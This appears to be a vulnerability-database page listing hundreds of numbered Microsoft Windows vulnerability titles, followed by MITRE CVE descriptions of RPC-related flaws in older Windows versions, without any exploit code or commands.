ClickOnce Application memory corruption [4484] Microsoft Windows Phone 7.5 SMS Service weak encryption [4481] Microsoft Windows Media Player ENCDEC.DLL privilege escalation [4478] Microsoft Windows Server 2003/XP OLE Objects Memory Management privilege escalation [4474] Microsoft Windows 7/Server 2003/Server 2008/Vista/XP Active Directory Query memory corruption [4458] Microsoft Windows Apple Safari win32k.sys privilege escalation [4455] Microsoft Windows XP Keyboard Layout win32k.sys denial of service [4452] Microsoft Windows Adctive Directory Query memory corruption [4451] Microsoft Windows Kernel Exception privilege escalation [4450] Microsoft Windows OLE Objects Property privilege escalation [4449] Microsoft Windows CSRSS Device Event Message privilege escalation [4448] Microsoft Windows 7/Vista/XP Media DVR-MS Parser privilege escalation [4447] Microsoft Windows Time ActiveX Control privilege escalation [4440] Microsoft Windows Active Directory weak authentication [4439] Microsoft Windows True Type Fonts privilege escalation [4438] Microsoft Windows 7/Server 2008/Vista TCP/IP Reference Counter Numeric Error [4436] Microsoft Windows True Type Fonts win32k.sys memory corruption [4431] Microsoft Windows SSL/TLS IV privilege escalation [4422] Microsoft Windows Driver win32k.sys memory corruption [4421] Microsoft Windows Ancillary Function Driver privilege escalation [4410] Microsoft Windows Library Loader privilege escalation [4409] Microsoft Windows Server 2003/Server 2008 WINS privilege escalation [4396] Microsoft Windows 7/Server 2008/Vista TCP/IP Stack denial of service [4395] Microsoft Windows Client/Server Run-Time Subsystem privilege escalation [4394] Microsoft Windows DNS Service Domain Lookup memory corruption [4393] Microsoft Windows Server 2008 DNS Service privilege escalation [4392] Microsoft Windows Remote Access Service privilege escalation [4390] Microsoft Windows Server 2008 Remote Desktop Web Access cross site scripting [4389] Microsoft Windows Remote Desktop Protocol denial of service [4388] Microsoft Windows 7/Server 2008/Vista File Metadata Parser denial of service [4386] Microsoft Windows XP denial of service [4382] Microsoft Windows CSRSS memory corruption [4381] Microsoft Windows 7/Vista Bluetooth Driver Object privilege escalation [4380] Microsoft Windows Driver win32k.sys denial of service [4373] Microsoft Windows MHTML cross site scripting [4371] Microsoft Windows Distributed File System memory corruption [4367] Microsoft Windows Server 2008 Hyper-V VMBus denial of service [4366] Microsoft Windows OLE Automatisation Numeric Error [4365] Microsoft Windows OpenType Font privilege escalation [4364] Microsoft Windows Active Directory cross site scripting [4363] Microsoft Windows SMB Client privilege escalation [4362] Microsoft Windows 7/Server 2008/Vista denial of service [4361] Microsoft Windows Ancillary Function Driver privilege escalation [4347] Microsoft Windows WINS Service privilege escalation [4339] Microsoft Windows JScript/VBScript Numeric Error [4338] Microsoft Windows DNS privilege escalation [4337] Microsoft Windows OpenType Font memory corruption [4336] Microsoft Windows Driver win32k.sys denial of service [4335] Microsoft Windows GDI+ Numeric Error [4333] Microsoft Windows Wordpad privilege escalation [4331] Microsoft Windows SMB Transaction Parser privilege escalation [4314] Microsoft Windows DirectShow/Windows Media privilege escalation [4313] Microsoft Windows Remote Desktop Client privilege escalation [4301] Microsoft Windows Server 2003 SMB Browser memory corruption [4298] Microsoft Windows 7/Server 2008 JScript/VBScript Engine information disclosure [4297] Microsoft Windows 7/Server 2003/Server 2008/Vista/XP OpenType Compact Font Format Driver privilege escalation [4296] Microsoft Windows Server 2003/XP LSASS weak authentication [4295] Microsoft Windows 7/Server 2008 Kerberos weak authentication [4294] Microsoft Windows 7/Server 2003/Server 2008/Vista/XP Driver win32k.sys privilege escalation [4293] Microsoft Windows Server 2003/XP Kerberos CRC32 Checksum weak encryption [4292] Microsoft Windows Server 2003/XP CSRSS Logoff privilege escalation [4279] Microsoft Windows 7/Server 2003/Server 2008/Vista/XP MHTML cross site scripting [4238] Microsoft Windows Data Access Components Numeric Error [4237] Microsoft Windows Thumbnail Bitmap Parser memory corruption [4235] Microsoft Windows Fax Cover Page Editor memory corruption [4233] Microsoft Windows privilege escalation [4231] Microsoft Windows 7/Server 2003/Server 2008/Vista/XP Driver win32k.sys GreEnableEUDC memory corruption [4230] Microsoft Exchange 2007 on 64-bit RPC store.exe denial of service [4228] Microsoft Windows Server 2008 Hyper-V VMBus privilege escalation [4226] Microsoft Windows OpenType Font Driver privilege escalation [4225] Microsoft Windows Routing/Remote Access NDProxy memory corruption [4224] Microsoft Windows 7/Server 2008/Vista Consent User Interface privilege escalation [4207] Microsoft Windows Keyboard Layout win32k.sys memory corruption [4204] Microsoft Windows Server 2008 Color Control Panel unknown vulnerability [4202] Microsoft Windows Keyboard Layout win32k.sys Windows Class privilege escalation [4201] Microsoft Windows OpenType Font Parser Numeric Error [4198] Microsoft Windows Shell/Wordpad privilege escalation [4195] Microsoft Windows Integer Truncation Common Control Library memory corruption [4194] Microsoft Windows 7/Server 2008/Vista SChannel Client privilege escalation [4193] Microsoft Windows OpenType Font Parser privilege escalation [4192] Microsoft Windows LPC Message memory corruption [4187] Microsoft Windows 7/Server 2008/Vista TCP/IP Stack Ipv4SetEchoRequestCreate denial of service [4185] Microsoft Windows Client/Server Run-Time Subsystem privilege escalation [4184] Microsoft Windows LSASS memory corruption [4183] Microsoft Windows Unicode Script Processor privilege escalation [4182] Microsoft Windows MPEG-4 Codec Content Parser privilege escalation [4166] Microsoft Windows SMB Server privilege escalation [4165] Microsoft Windows 7/Server 2008/Vista TCP/IP Stack memory corruption [4162] Microsoft Windows 7/Server 2008/Vista Kernel race condition [4161] Microsoft Windows TLS/SSL Session weak encryption [4158] Microsoft Windows Driver win32k.sys CreateDIBPalette memory corruption [4152] Microsoft Windows MFC Document Title Updating memory corruption [4151] Microsoft Windows Server 2008/Vista NtUserCheckAccessForIntegrityLevel denial of service [4149] Microsoft Windows 7/Server 2003/Server 2008/Vista/XP Shell Shortcut Parser privilege escalation [4139] Microsoft Windows Help/Support Center privilege escalation [4136] Microsoft Windows Media Decompression privilege escalation [4135] Microsoft Windows Kernel Mode Driver privilege escalation [4134] Microsoft Windows OpenType Compact Font Format Driver privilege escalation [4126] Microsoft Windows Mail STAT Numeric Error [4107] Microsoft Windows 7/Server 2008 Kernel privilege escalation [4105] Microsoft Windows SMB Client denial of service [4104] Microsoft Windows SMTP Service privilege escalation [4103] Microsoft Windows Server 2003 Media Services memory corruption [4102] Microsoft Windows Authentication Verification privilege escalation [4101] Microsoft Windows ISATAP privilege escalation [4100] Microsoft Windows MPEG Layer-3 Codec memory corruption [4089] Microsoft Windows Movie Maker memory corruption [4088] Microsoft Windows HLP File MsgBox privilege escalation [4087] Microsoft Windows DirectShow memory corruption [4086] Microsoft Windows CSRSS privilege escalation [4085] Microsoft Windows SMB Client privilege escalation [4084] Microsoft Windows Shell privilege escalation [4083] Microsoft Windows Paint Numeric Error [4076] Microsoft Windows Embedded OpenType Font Engine Numeric Error [4070] Microsoft Windows Indeo Codec memory corruption [4068] Microsoft Windows MS-CHAP Authentication privilege escalation [4067] Microsoft Windows Active Directory Federation Service privilege escalation [4066] Microsoft Windows Local Security Authority Subsystem denial of service [4060] Microsoft Windows Win32k Kernel Mode Driver privilege escalation [4058] Microsoft Windows Active Directory denial of service [4051] Microsoft Windows GDI+ privilege escalation [4050] Microsoft Windows ActiveX Control memory corruption [4049] Microsoft Windows ActiveX Controls ATL OleLoadFromStream privilege escalation [4044] Microsoft Windows Media Runtime privilege escalation [4031] Microsoft Windows Server 2008/Vista SMB Processor EducatedScholar denial of service [4030] Microsoft Windows Server 2008/Vista Wireless LAN AutoConfig Service memory corruption [4029] Microsoft Windows 2000/XP TCP/IP Window Size denial of service [4028] Microsoft Windows ASF/MP3 Media privilege escalation [4026] Microsoft Windows DHTML Editing ActiveX Control privilege escalation [4025] Microsoft Windows privilege escalation [4016] Microsoft Windows Remote Desktop Connection memory corruption [4014] Microsoft Windows Workstation Service denial of service [4013] Microsoft Windows Message Queuing Service privilege escalation [4012] Microsoft Windows WINS Service Numeric Error [4011] Microsoft Windows WINS Service memory corruption [4010] Microsoft Windows AVI Movie privilege escalation [4001] Microsoft Windows DirectShow memory corruption [3998] Microsoft Windows Embedded OpenType Font Engine memory corruption [3997] Microsoft Windows Embedded OpenType Font Engine Numeric Error [3990] Microsoft Windows Print Spooler memory corruption [3989] Microsoft Windows Print Spooler memory corruption [3988] Microsoft Windows Print Spooler EnumeratePrintShares memory corruption [3979] Microsoft Windows DirectShow memory corruption [3960] Microsoft Windows 2000/Server 2003/XP DirectShow MJPEG privilege escalation [3950] Microsoft Windows HTTP Service Numeric Error [3939] Microsoft Windows 2000 DNS privilege escalation [3938] Microsoft Windows 2000 SSL weak authentication [3937] Microsoft Windows 2000 privilege escalation [3895] Microsoft Windows GDI Image Parser memory corruption [3894] Microsoft Windows GDI Image Parser Numeric Error [3893] Microsoft Windows WordPad denial of service [3866] Microsoft Windows SMB Authentication weak authentication [3860] Microsoft Windows Path Canonicalisation EclipsedWing privilege escalation [3853] Microsoft Windows Ancillary Function Driver privilege escalation [3852] Microsoft Windows SMB memory corruption [3851] Microsoft Windows IIS IPP Service Numeric Error [3850] Microsoft Windows privilege escalation [3849] Microsoft Windows denial of service [3846] Microsoft Windows privilege escalation [3845] Microsoft Windows 2000 SP4 Active Directory denial of service [3822] Microsoft Windows GDI+ BMP Image Numeric Error [3821] Microsoft Windows GDI+ WMF File Numeric Error [3820] Microsoft Windows GDI+ GIF Image Numeric Error [3819] Microsoft Windows GDI+ EMF File Numeric Error [3818] Microsoft Windows GDI+ Numeric Error [3812] Microsoft Windows Vista Bitlocker Password Output information disclosure [3806] Microsoft Windows Color Management memory corruption [3797] Microsoft Windows Server 2008/Vista IPsec Policy information disclosure [3777] Microsoft Windows Server 2008/Vista SP1 Explorer privilege escalation [3733] Microsoft Windows Active Directory privilege escalation [3732] Microsoft Windows 2000/Server 2003 WINS privilege escalation [3730] Microsoft Windows Vista/XP privilege escalation [3699] Microsoft Windows CE Image privilege escalation [3686] Microsoft Windows privilege escalation [3675] Microsoft Windows Kernel privilege escalation [3674] Microsoft Windows ActiveX Control hxvz.dll privilege escalation [3673] Microsoft Windows memory corruption [3672] Microsoft Windows GDI WMF Color Depth memory corruption [3603] Microsoft Windows NT 4.0/2000/XP/Vista OLE Automation privilege escalation [3542] Microsoft Windows LSASS privilege escalation [3541] Microsoft Windows ICMP Fragmentation memory corruption [3540] Microsoft Windows IGMPv3/MLDv2 memory corruption [3505] Microsoft Windows Vista Kernel Legacy Reply Path Validator privilege escalation [3504] Microsoft Windows Message Queue memory corruption [3500] Microsoft Windows Vista SMBv2 Signing privilege escalation [3372] Microsoft Windows SharePoint Services cross site scripting [3368] Microsoft Windows up to Vista NNTP Response memory corruption [3367] Microsoft Windows Kodak Image Viewer privilege escalation [3302] Microsoft Windows Services for UNIX privilege escalation [3253] Microsoft Windows OLE Automation substringData memory corruption [3242] Microsoft Windows VML Vector Markup Language memory corruption [3223] Microsoft Windows Server 2003/XP URI privilege escalation [3179] Microsoft Windows Active Directory denial of service [3178] Microsoft Windows Active Directory memory corruption [3177] Microsoft Windows Vista Firewall Teredo unknown vulnerability [3128] Microsoft Windows Win32 API memory corruption [3012] Microsoft Windows 2000/Server 2003 DNS Service memory corruption [3005] Microsoft Windows XP memory corruption [3004] Microsoft Windows up to 2003/XP URL Parser memory corruption [2991] Microsoft Windows Vista ATI Radeon Kernel Mode Driver denial of service [2990] Microsoft Windows 2000/Vista/XP Animated Cursor memory corruption [2933] Microsoft Windows 2000 SP4/Server 2003 SP1/XP SP2 OLE Dialog privilege escalation [2932] Microsoft Windows Malware Protection Engine Integer Coercion Error [2925] Microsoft Windows HTML Help ActiveX Control memory corruption [2811] Microsoft Windows 2000/Server 2003/XP VML Vector Markup Language Integer Coercion Error [2788] Microsoft Windows up to Vista CSRSS WINSRV.DLL MessageBox memory corruption [2739] Microsoft Windows 2000 Remote Installation Service unknown vulnerability [2738] Microsoft Windows 2000/Server 2003/XP SNMP memory corruption [2737] Microsoft Windows Server 2003/XP Manifest privilege escalation [2724] Microsoft Windows up to 10 Media Player memory corruption [2717] Microsoft Windows 2000 Print Spooler denial of service [2689] Microsoft Windows up to 2000 SP4 Active Directory denial of service [2688] Microsoft Windows 2000/Server 2003/XP Client Service for Netware denial of service [2687] Microsoft Windows 2000/Server 2003/XP Agent ActiveX Numeric Error [2686] Microsoft Windows 2000/Server 2003/XP Client Service for Netware memory corruption [2684] Microsoft Windows 2000/XP Workstation Service memory corruption [2659] Microsoft Windows 2000/XP GDI memory corruption [2655] Microsoft Windows 2000/Server 2003/XP XML Core Services memory corruption [2640] Microsoft Windows XP Windows NAT Helper Component ipnathlp.dll denial of service [2601] Microsoft Windows Server 2003/XP IPv6 Stack denial of service [2600] Microsoft Windows Server 2003/XP IPv6 Stack TCP weak encryption [2599] Microsoft Windows Server 2003/XP IPv6 Stack ICMP weak encryption [2598] Microsoft Windows Server 2003/XP Object Packager privilege escalation [2522] Microsoft Windows 2000/Server 2003/XP Indexing Service cross site scripting [2520] Microsoft Windows XP Pragmatic General Multicast privilege escalation [2436] Microsoft Windows 2000/Server 2003/XP Kernel memory corruption [2435] Microsoft Windows 2000/Server 2003/XP Exception memory corruption [2434] Microsoft Windows 2000/Server 2003/XP Winlogon privilege escalation [2433] Microsoft Windows 2000 Management Console cross site scripting [2432] Microsoft Windows 2000/Server 2003/XP DNS Resolver memory corruption [2431] Microsoft Windows 2000/Server 2003/XP Winsock API memory corruption [2426] Microsoft Windows 2000/Server 2003/XP WMF File gdi32.dll denial of service [2415] Microsoft Windows 2000/Server 2003/XP SMB File srv.sys privilege escalation [2370] Microsoft Windows 2000/Server 2003/XP Server Protocol Driver memory corruption [2369] Microsoft Windows 2000/Server 2003/XP Server Service Mailslot memory corruption [2366] Microsoft Windows 2000/Server 2003/XP DHCP Client memory corruption [2311] Microsoft Windows 2000/Server 2003/XP MRXSMB.SYS MRxSmbCscIoctlOpenForCopyChunk privilege escalation [2309] Microsoft Windows 2000/Server 2003/XP Routing/Remote Access Service memory corruption [2307] Microsoft Windows 2000/Server 2003/XP JScript Object memory corruption [2306] Microsoft Windows 2000/Server 2003/XP IP Source Routing memory corruption [2305] Microsoft Windows Server 2003/XP ART Image memory corruption [2295] Microsoft Windows 9/10 Media Player memory corruption [2275] Microsoft Windows Server 2003/XP mhtml URI inetcomm.dll memory corruption [2221] Microsoft Windows 2000/XP CHM Archive itss.dll memory corruption [2218] Microsoft Windows 2000/Server 2003/XP MSDTC memory corruption [2147] Microsoft Windows 2000/Server 2003/XP COM Object memory corruption [2054] Microsoft Windows up to 10 Media Player memory corruption [2051] Microsoft Windows Server 2003/XP Web Client Service memory corruption [2050] Microsoft Windows Server 2003/XP TCP/IP IGMP memory corruption [2049] Microsoft Windows 2000/Server 2003/XP Media Player memory corruption [2036] Microsoft Windows Server 2003/XP Service privilege escalation [1962] Microsoft Windows 2000/Server 2003/XP Web Fonts memory corruption [1934] Microsoft Windows Server 2003/XP WMF File privilege escalation [1917] Microsoft Windows NT 4.0/2000 unknown vulnerability [1909] Microsoft Windows up to XP SP1 UPnP GetDeviceList denial of service [1876] Microsoft Windows 2000/XP WMF/EMF File Integer Coercion Error [1801] Microsoft Windows 2000/Server 2003/XP Client Service for Netware memory corruption [1798] Microsoft Windows 2000/Server 2003/XP Transaction Internet Protocol denial of service [1797] Microsoft Windows 2000/Server 2003/XP COM+ memory corruption [1796] Microsoft Windows 2000/Server 2003/XP Distributed Transaction Coordinator memory corruption [1793] Microsoft Windows 2000/Server 2003/XP Explorer HTML Preview cross site scripting [1792] Microsoft Windows 2000/Server 2003/XP lnk File memory corruption [1791] Microsoft Windows 2000/Server 2003/XP lnk File memory corruption [1789] Microsoft Windows 2000/Server 2003/XP Plug-and-Play Service memory corruption [1781] Microsoft Windows XP Wireless Zero Configuration WZCQueryInterface unknown vulnerability [1726] Microsoft Windows XP SP2 unknown vulnerability [1692] Microsoft Windows up to Server 2003 Print Spooler memory corruption [1691] Microsoft Windows 2000/Server 2003/XP Kerberos memory corruption [1690] Microsoft Windows 2000/Server 2003/XP Kerberos denial of service [1689] Microsoft Windows up to Server 2003 Plug-and-Play Service memory corruption [1687] Microsoft Windows up to XP Telephony Application Programming Interface memory corruption [1653] Microsoft Windows up to XP USB Driver memory corruption [1623] Microsoft Windows 2000/XP Network Connectivity netman.dll denial of service [1621] Microsoft Windows up to XP SP2 Kernel denial of service [1596] Microsoft Windows 95/98/2000/Server 2003/XP Color Management memory corruption [1570] Microsoft Windows 2000/Server 2003/XP SMB memory corruption [1569] Microsoft Windows Server 2003/XP Web Client Service memory corruption [1568] Microsoft Windows 2000/Server 2003/XP Agent Internet Content cross site scripting [1567] Microsoft Windows 2000/Server 2003/XP HTML Help Input memory corruption [1547] Microsoft Windows 2000/Server 2003/XP Remote Desktop mstlsapi.dll weak authentication [1411] Microsoft Windows up to XP SP2 Image denial of service [1407] Microsoft Windows 2000 Web View webvw.dll memory corruption [1358] Microsoft Windows 2000/Server 2003/XP CSRSS memory corruption [1357] Microsoft Windows 2000/Server 2003/XP Objekt Manager memory corruption [1356] Microsoft Windows 2000/Server 2003/XP Kernel Access memory corruption [1355] Microsoft Windows 2000/Server 2003/XP Font File memory corruption [1350] Microsoft Windows 2000/Server 2003/XP Shell MSHTA.EXE memory corruption [1328] Microsoft Windows Server 2003 Print Color Adjustment denial of service [1327] Microsoft Windows Server 2003 SMB denial of service [1291] Microsoft Windows 2000 EMF File GetEnhMetaFilePaletteEntries denial of service [1268] Microsoft Windows Server 2003/XP TCP/IP Stack denial of service [1196] Microsoft Windows up to XP/Server 2003 Drag / Drop memory corruption [1195] Microsoft Windows 98/2000/ME/XP OLE File memory corruption [1194] Microsoft Windows/Office up to XP COM File unknown vulnerability [1193] Microsoft Windows NT 4.0/2000/Server 2003 License Logging Server privilege escalation [1191] Microsoft Windows XP Hyperlink Object Library memory corruption [1190] Microsoft Windows XP Named Pipe Connection memory corruption [1189] Microsoft Windows 2000/Server 2003/XP SMB memory corruption [1107] Microsoft Windows Server 2003/XP Indexing Service memory corruption [1088] Microsoft Windows up to XP SP2 HLP File winhlp32.exe memory corruption [1087] Microsoft Windows up to XP SP2 ANI File memory corruption [1086] Microsoft Windows up to XP SP2 LoadImage API memory corruption [1076] Microsoft Windows 9 Media Player setItemInfo privilege escalation [1075] Microsoft Windows 9 Media Player getItemInfoByAtom information disclosure [1070] Microsoft Windows XP SP2 privilege escalation [1042] Microsoft Windows up to Server 2003 HyperTerminal URL memory corruption [1041] Microsoft Windows up to XP WINS Name Validator memory corruption [1040] Microsoft Windows up to XP Local Security Authority Subsystem Service memory corruption [1039] Microsoft Windows up to XP Local Procedure Call memory corruption [1038] Microsoft Windows up to XP WordPad Word for Windows 6.0 Converter memory corruption [1037] Microsoft Windows NT 4.0 DHCP Service memory corruption [1036] Microsoft Windows NT 4.0 Server memory corruption [1011] Microsoft Windows WINS memory corruption [937] Microsoft Windows XP WAV Media File denial of service [909] Microsoft Windows NT 4.0/2000/XP ASCII Editor unknown vulnerability [908] Microsoft Windows XP JPEG ActiveX Image Control asycpict.dll denial of service [899] Microsoft Windows memory corruption [898] Microsoft Windows XP on 64-bit SMTP DNS Reply memory corruption [897] Microsoft Windows Server 2003/XP ZIP Archive dunzip32.dll memory corruption [891] Microsoft Windows memory corruption [890] Microsoft Windows denial of service [889] Microsoft Windows memory corruption [888] Microsoft Windows privilege escalation [886] Microsoft Windows denial of service [885] Microsoft Windows 2000/Server 2003/XP WebDAV XML Message denial of service [883] Microsoft Windows NT 4.0/2000/Server 2003 memory corruption [862] Microsoft Windows 2000/XP SYSTEM32 memory corruption [860] Microsoft Windows 2000/XP Packet Fragmentation denial of service [833] Microsoft Windows memory corruption [792] Microsoft Windows up to XP SP2 Internet Download cmd.exe unknown vulnerability [765] Microsoft Windows memory corruption [764] Microsoft Windows NT 4.0/2000/XP Task Scheduler containing memory corruption [763] Microsoft Windows NT 4.0/2000 POSIX Subsystem memory corruption [761] Microsoft Windows 2000 Utility Manager winhlp32.exe memory corruption [683] Microsoft Windows 2000 weak authentication [664] Microsoft Windows 2000/XP CLSID desktop.ini memory corruption [655] Microsoft Windows FTPD Sasser Worm memory corruption [637] Microsoft Windows NetBIOS Share Name memory corruption [618] Microsoft Windows Server 2003 MS04-011 Patch unknown vulnerability [610] Microsoft Windows up to XP/Server 2003 ASN.1 Library memory corruption [609] Microsoft Windows 2000/Server 2003/XP Negotiate Security Software Provider memory corruption [608] Microsoft Windows NT 4.0/2000 Virtual DOS Machine denial of service [607] Microsoft Windows NT 4.0/2000/XP Local Descriptor Table privilege escalation [606] Microsoft Windows XP Taskmanager memory corruption [605] Microsoft Windows 2000 Utility Manager memory corruption [604] Microsoft Windows Server 2003/XP Help/Support Center memory corruption [603] Microsoft Windows 2000 Metafile WMF/EMF Integer Coercion Error [602] Microsoft Windows NT 4.0/2000/XP WinLogon Domain Object memory corruption [601] Microsoft Windows up to XP/Server 2003 PCT Message memory corruption [600] Microsoft Windows 2000 Domain Controller memory corruption [599] Microsoft Windows up to Server 2003 LSASS Request memory corruption [564] Microsoft Windows XP on WinXP WMF File explorer.exe denial of service [530] Microsoft Windows XP EMF File shimgvw.dll Integer Coercion Error [518] Microsoft Windows Server 2003/XP ntdll.dll unknown vulnerability [516] Microsoft Windows up to XP SP1 BMP Image imgbmp.cxx memory corruption [509] Microsoft Windows NT 4.0/2000/XP/Server 2003 WINS Server GS privilege escalation [508] Microsoft Windows NT 4.0/2000/XP/Server 2003 ASN.1 lsass.exe Integer Coercion Error [491] Microsoft Windows XP .folder memory corruption [441] Microsoft Windows SHELL32.DLL memory corruption [414] Microsoft Windows XP BIOS Date Reset denial of service [383] Microsoft Windows 2000/XP Workstation Service memory corruption [350] Microsoft Windows 2000/NT/Server 2003/XP HTML Help memory corruption [348] Microsoft Windows XP CommCtl32.dll memory corruption [332] Microsoft Windows NT 4.0/2000/XP Messenger Service memory corruption [328] Microsoft Windows 2000 Message Queuing Service mqsvc.exe memory corruption [323] Microsoft Windows Server 2003 Shell Folder information disclosure [318] Microsoft Windows Media Player 6.4/7/7.1/9 unknown vulnerability [312] Microsoft Windows 2000/Server 2003/Vista/XP PostThreadMessage unknown vulnerability [286] Microsoft Windows Server 2003 Buffer Overflow Protection unknown vulnerability [278] Microsoft Windows XP ZIP Manager memory corruption [270] Microsoft Windows XP SP1 TCP Packet unknown vulnerability [269] Microsoft Windows up to 98 SP1 UDP Fragment denial of service [261] Microsoft Windows NT 4.0 NetBIOS information disclosure [249] Microsoft Windows NT 4.0/2000/XP/Server 2003 Blaster/Eske memory corruption [193] Microsoft Windows up to 8.x Media Player unknown vulnerability [179] Microsoft Windows XP desktop.ini memory corruption [175] Microsoft Windows up to 2000 SP3 SMTP Timestamp denial of service [165] Microsoft Windows NT 4.0/2000/XP SMB memory corruption [164] Microsoft Windows up to XP/Server 2003 HTML Converter memory corruption [158] Microsoft Windows 2000/XP rundll32.exe memory corruption [155] Microsoft Windows up to 2000 SP3 LDAP Cryptnet.DLL denial of service [153] Microsoft Windows 2000 Terminal Service unknown vulnerability [151] Microsoft Windows up to 2000 SP3 ModifyDN Request denial of service [150] Microsoft Windows up to 2000 SP3 Domain Controller unknown vulnerability [149] Microsoft Windows up to 2000 SP3 Port Name API memory corruption [146] Microsoft Windows up to 2000 SP3 IMAADPCM cbDestLength memory corruption [145] Microsoft Windows 2000 Active Directory weak authentication [135] Microsoft Windows 2000 API ShellExecute memory corruption [134] Microsoft Windows up to 2000 SP3 Active Directory memory corruption [124] Microsoft Windows 5 Media Service ISAPI Extension /scripts memory corruption [123] Microsoft Windows 9 Media Player privilege escalation [71] Microsoft Windows Media Player unknown vulnerability [69] Microsoft Windows XP Internet Connection Firewall unknown vulnerability [61] Microsoft Windows XP Media Player 7.1 privilege escalation [41] Microsoft Windows Form Input Type denial of service [9] Microsoft Windows riched20.dll memory corruption [8] Microsoft Windows NT 4.0/2000 cmd.exe cd memory corruption [4] Microsoft Windows 2000 NetBIOS denial of service MITRE CVE - https://cve.mitre.org: [CVE-2010-3222] Stack-based buffer overflow in the Remote Procedure Call Subsystem (RPCSS) in Microsoft Windows XP SP2 and SP3 and Server 2003 SP2 allows local users to gain privileges via a crafted LPC message that requests an LRPC connection from an LPC server to a client, aka "LPC Message Buffer Overrun Vulnerability." [CVE-2010-3139] Untrusted search path vulnerability in Microsoft Windows Progman Group Converter (grpconv.exe) allows local users, and possibly remote attackers, to execute arbitrary code and conduct DLL hijacking attacks via a Trojan horse imm.dll that is located in the same folder as a .grp file. [CVE-2010-2742] The Netlogon RPC Service in Microsoft Windows Server 2003 SP2 and Server 2008 Gold, SP2, and R2, when the domain controller role is enabled, allows remote attackers to cause a denial of service (NULL pointer dereference and reboot) via a crafted RPC packet, aka "Netlogon RPC Null dereference DOS Vulnerability." [CVE-2010-2729] The Print Spooler service in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7, when printer sharing is enabled, does not properly validate spooler access permissions, which allows remote attackers to create files in a system directory, and consequently execute arbitrary code, by sending a crafted print request over RPC, as exploited in the wild in September 2010, aka "Print Spooler Service Impersonation Vulnerability." [CVE-2010-2567] The RPC client implementation in Microsoft Windows XP SP2 and SP3 and Server 2003 SP2 does not properly allocate memory during the parsing of responses, which allows remote RPC servers and man-in-the-middle attackers to execute arbitrary code via a malformed response, aka "RPC Memory Corruption Vulnerability." [CVE-2009-2523] The License Logging Server (llssrv.exe) in Microsoft Windows 2000 SP4 allows remote attackers to execute arbitrary code via an RPC message containing a string without a null terminator, which triggers a heap-based buffer overflow in the LlsrLicenseRequestW method, aka "License Logging Server Heap Overflow Vulnerability." [CVE-2009-1544] Double free vulnerability in the Workstation service in Microsoft Windows allows remote authenticated users to gain privileges via a crafted RPC message to a Windows XP SP2 or SP3 or Server 2003 SP2 system, or cause a denial of service via a crafted RPC message to a Vista Gold, SP1, or SP2 or Server 2008 Gold or SP2 system, aka "Workstation Service Memory Corruption Vulnerability." [CVE-2009-0568] The RPC Marshalling Engine (aka NDR) in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold, SP1, and SP2, and Server 2008 SP2 does not properly maintain its internal state, which allows remote attackers to overwrite arbitrary memory locations via a crafted RPC message that triggers incorrect pointer reading, related to "IDL interfaces containing a non-conformant varying array" and FC_SMVARRAY, FC_LGVARRAY, FC_VARIABLE_REPEAT, and FC_VARIABLE_OFFSET, aka "RPC Marshalling Engine Vulnerability." [CVE-2009-0230] The Windows Print Spooler in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold, SP1, and SP2, and Server 2008 SP2 allows remote authenticated users to gain privileges via a crafted RPC message that triggers loading of a DLL file from an arbitrary directory, aka "Print Spooler Load Library Vulnerability." [CVE-2009-0228] Stack-based buffer overflow in the EnumeratePrintShares function in Windows Print Spooler Service (win32spl.dll) in Microsoft Windows 2000 SP4 allows remote printer servers to execute arbitrary code via a a crafted ShareName in a response to an RPC request, related to "printing data structures," aka "Buffer Overflow in Print Spooler Vulnerability." [CVE-2009-0079] The RPCSS service in Microsoft Windows XP SP2 and SP3 and Server 2003 SP1 and SP2 does not properly implement isolation among a set of distinct processes that (1) all run under the NetworkService account or (2) all run under the LocalService account, which allows local users to gain privileges by accessing the resources of one of the processes, aka "Windows RPCSS Service Isolation Vulnerability." [CVE-2008-4250] The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary code via a crafted RPC request that triggers the overflow during path canonicalization, as exploited in the wild by Gimmiv.A in October 2008, aka "Server Service Vulnerability." [CVE-2008-4114] srv.sys in the Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, and Server 2008 allows remote attackers to cause a denial of service (system crash) or possibly have unspecified other impact via an SMB WRITE_ANDX packet with an offset that is inconsistent with the packet size, related to "insufficiently validating the buffer size," as demonstrated by a request to the \PIPE\lsarpc named pipe, aka "SMB Validation Denial of Service Vulnerability." [CVE-2008-3479] Heap-based buffer overflow in the Microsoft Message Queuing (MSMQ) service (mqsvc.exe) in Microsoft Windows 2000 SP4 allows remote attackers to read memory contents and execute arbitrary code via a crafted RPC call, related to improper processing of parameters to string APIs, aka "Message Queuing Service Remote Code Execution Vulnerability." [CVE-2007-3039] Stack-based buffer overflow in the Microsoft Message Queuing (MSMQ) service in Microsoft Windows 2000 Server SP4, Windows 2000 Professional SP4, and Windows XP SP2 allows attackers to execute arbitrary code via a long string in an opnum 0x06 RPC call to port 2103. NOTE: this is remotely exploitable on Windows 2000 Server. [CVE-2007-2228] rpcrt4.dll (aka the RPC runtime library) in Microsoft Windows XP SP2, XP Professional x64 Edition, Server 2003 SP1 and SP2, Server 2003 x64 Edition and x64 Edition SP2, and Vista and Vista x64 Edition allows remote attackers to cause a denial of service (RPCSS service stop and system restart) via an RPC request that uses NTLMSSP PACKET authentication with a zero-valued verification trailer signature, which triggers an invalid dereference. NOTE: this also affects Windows 2000 SP4, although the impact is an information leak. [CVE-2007-1748] Stack-based buffer overflow in the RPC interface in the Domain Name System (DNS) Server Service in Microsoft Windows 2000 Server SP 4, Server 2003 SP 1, and Server 2003 SP 2 allows remote attackers to execute arbitrary code via a long zone name containing character constants represented by escape sequences. [CVE-2006-6723] The Workstation service in Microsoft Windows 2000 SP4 and XP SP2 allows remote attackers to cause a denial of service (memory consumption) via a large maxlen value in an NetrWkstaUserEnum RPC request. [CVE-2006-6296] The RpcGetPrinterData function in the Print Spooler (spoolsv.exe) service in Microsoft Windows 2000 SP4 and earlier, and possibly Windows XP SP1 and earlier, allows remote attackers to cause a denial of service (memory consumption) via an RPC request that specifies a large 'offered' value (output buffer size), a variant of CVE-2005-3644. 